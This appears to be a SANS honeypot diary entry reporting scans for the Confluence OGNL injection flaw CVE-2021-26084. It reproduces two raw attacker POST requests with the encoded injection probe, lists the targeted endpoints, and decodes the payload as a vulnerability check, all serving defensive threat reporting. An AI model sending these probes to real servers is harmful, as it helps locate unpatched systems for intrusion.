Looking over some of our honeypot logs today, I noticed one IP address, 60.223.74.99, scanning for several older Confluence vulnerabilities. 

Confluence is the collaboration component of Atlassian's suite of developer tools [1]. Attacks against developers, and the tools they are using, are on the rise in general, and this is yet another "piece to the puzzle." A quick search using NIST's NVD shows 18 vulnerabilities in Confluence [2].

The scans use a known PoC exploit for CVE-2021-26084, an OGNL injection vulnerability[3].

Here are two sample requests sent by the attacker:

POST /users/user-dark-features HTTP/1.1
Host: [redacted]:8090
User-Agent: Mozilla/5.0 (X11; Gentoo; rv:82.1) Gecko/20100101 Firefox/82.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 57

queryString=aaaa%5Cu0027%2B%7B506%2A5210%7D%2B%5Cu0027bbb
 

POST /pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1
Host: [redacted]:8090
User-Agent: Mozilla/5.0 (X11; Gentoo; rv:82.1) Gecko/20100101 Firefox/82.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 58

queryString=aaaa%5Cu0027%2B%7B3304%2A9626%7D%2B%5Cu0027bbb
 

All endpoints hit by the attacker:

/confluence/pages/createpage-entervariables.action
/confluence/pages/createpage-entervariables.action?SpaceKey=x
/pages/createpage.action?spaceKey=myproj
/pages/createpage-entervariables.action
/pages/createpage-entervariables.action?SpaceKey=x
/pages/doenterpagevariables.action
/pages/templates2/viewpagetemplate.action
/template/custom/content-editor
/templates/editor-preload-container
/users/user-dark-features
/wiki/pages/createpage-entervariables.action
/wiki/pages/createpage-entervariables.action?SpaceKey=x

The payload string decodes to:

aaaa'{506*5210}'bbb

The likely goal is to have the system return the result of the math problem to see if it is vulnerable to this attack.

No scans were seen from that source IP until today. It appears to be an otherwise unremarkable IP address allocated to what looks like a China Unicom consumer. It may be a CGNAT address used by China Unicom.

[1] https://www.atlassian.com/software/confluence
[2] https://nvd.nist.gov/vuln/search/results?form_type=Basic&results_type=overview&query=cpe%3A2.3%3Aa%3Aatlassian%3Aconfluence_data_center&search_type=all&isCpeNameSearch=false
[3] https://github.com/alt3kx/CVE-2021-26084_PoC

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|